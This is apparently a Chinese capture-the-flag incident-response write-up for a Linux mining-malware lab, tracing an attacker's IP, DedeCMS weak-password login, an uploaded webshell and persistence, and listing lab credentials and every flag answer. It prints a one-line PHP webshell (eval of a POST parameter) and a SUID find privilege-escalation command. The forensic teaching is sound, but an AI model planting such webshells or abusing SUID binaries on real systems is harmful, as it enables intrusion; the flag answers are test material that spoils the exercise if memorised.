玄机:第五章 linux实战-挖矿

简介

应急响应工程师在内网服务器发现有台主机 cpu 占用过高,猜测可能是中了挖矿病毒,请溯源分析,提交对应的报告给应急小组

复制代码
虚拟机账号:root
密码 :websecyjxy
web端口为:8081

1、黑客的IP是? flag格式:flag{黑客的ip地址},如:flag{127.0.0.1}

发现日志里有一个文件大小异常

复制代码
cd /www/admin/websec_80/log/
cut -d- -f 1 nginx_access_2023-12-22.log|uniq -c | sort -rn | head -20

发现了可疑 IP

复制代码
flag{192.168.10.135}

2、黑客攻陷网站的具体时间是? flag格式:flag{年-月-日 时:分:秒},如:flag{2023-12-24 22:23:24}

访问靶场网站

复制代码
52.83.102.186:8081/dede

是 dedecms, 使用弱口令登录

复制代码
账号:admin
密码:12345678

发现有两个账户,根据刚刚获取到的黑客ip,可以发现该时间

复制代码
flag{2023-12-22 19:08:34}

3、黑客上传webshell的名称及密码是? flag格式:flag{黑客上传的webshell名称-webshell密码},如:flag{webshell.php-pass}

将文件下载下来,使用 D盾进行扫描检测,发现了一个后门

找到该目录查看文件内容

解密之后是:eval($_POST['cmd']);

复制代码
flag{404.php-cmd}

4、黑客提权后设置的后门文件名称是? flag格式:flag{后门文件绝对路径加上名称},如:flag{/etc/passwd}

查看历史命令记录,发现 find 被赋予了suid权限,黑客可以使用suid提权做后门,

黑客执行以下命令即可从服务权限提升到root权限,即find文件被做了后门,( 黑客利用 find 命令被赋予了SUID权限后所进行的攻击)

find / -exec 任意命令 {} \;

复制代码
flag{/usr/bin/find}

5、对黑客上传的挖矿病毒进行分析,获取隐藏的Flag

找挖矿程序就要找计划任务但是crontab指令用不了

审查该文件/etc/crontab,在691行的一段python代码比较可疑,进行base64解码

复制代码
691 nohup python2 -c "import base64;exec(base64.b64decode('aW1wb3J0IHRpbWUKd2hpbGUgMToKICAgIHByaW50KCJmbGFne3dlYnNlY19Uc nVlQDg4OCF9IikKICAgIHRpbWUuc2xlZXAoMTAwMCk='))" >/dev/null 2>&1

获得最终的flag

复制代码
flag{websec_True@888!}

flag

复制代码
flag{192.168.10.135}
flag{2023-12-22 19:08:34}
flag{404.php-cmd}
flag{/usr/bin/find}
flag{websec_True@888!}
相关推荐
骥龙3 小时前
3.10、构建网络防线:防火墙、WAF 与蜜罐实战
服务器·网络·数据库·网络安全
国科安芯3 小时前
国产RISC-V架构MCU在工控系统中的节能性分析
网络·单片机·嵌入式硬件·fpga开发·性能优化·架构·risc-v
九河云3 小时前
华为云 ECS 弹性伸缩技术:应对业务峰值的算力动态调度策略
大数据·服务器·人工智能·物联网·华为云
夜月yeyue4 小时前
Linux内高端内存
linux·运维·单片机·嵌入式硬件·ci/cd·硬件架构
云宏信息4 小时前
运维效率提升实战:如何用轻量化云管平台统一纳管与自动化日常资源操作
运维·服务器·网络·架构·云计算
XINERTEL4 小时前
自动化测试的「千里眼」:当RTSM远程控制遇上自动化,测试效率直接拉满
运维·功能测试·自动化·以太网测试
猫豆~4 小时前
nginx实战-PHP——day2
linux·centos·云计算
杨云龙UP4 小时前
MySQL 自动备份与覆盖恢复实战:一套脚本搞定全库/按库备份恢复
linux·运维·数据库·sql·mysql
三小尛4 小时前
Linux的常见指令
linux
starvapour5 小时前
Ubuntu下sudo的免密操作
linux·ubuntu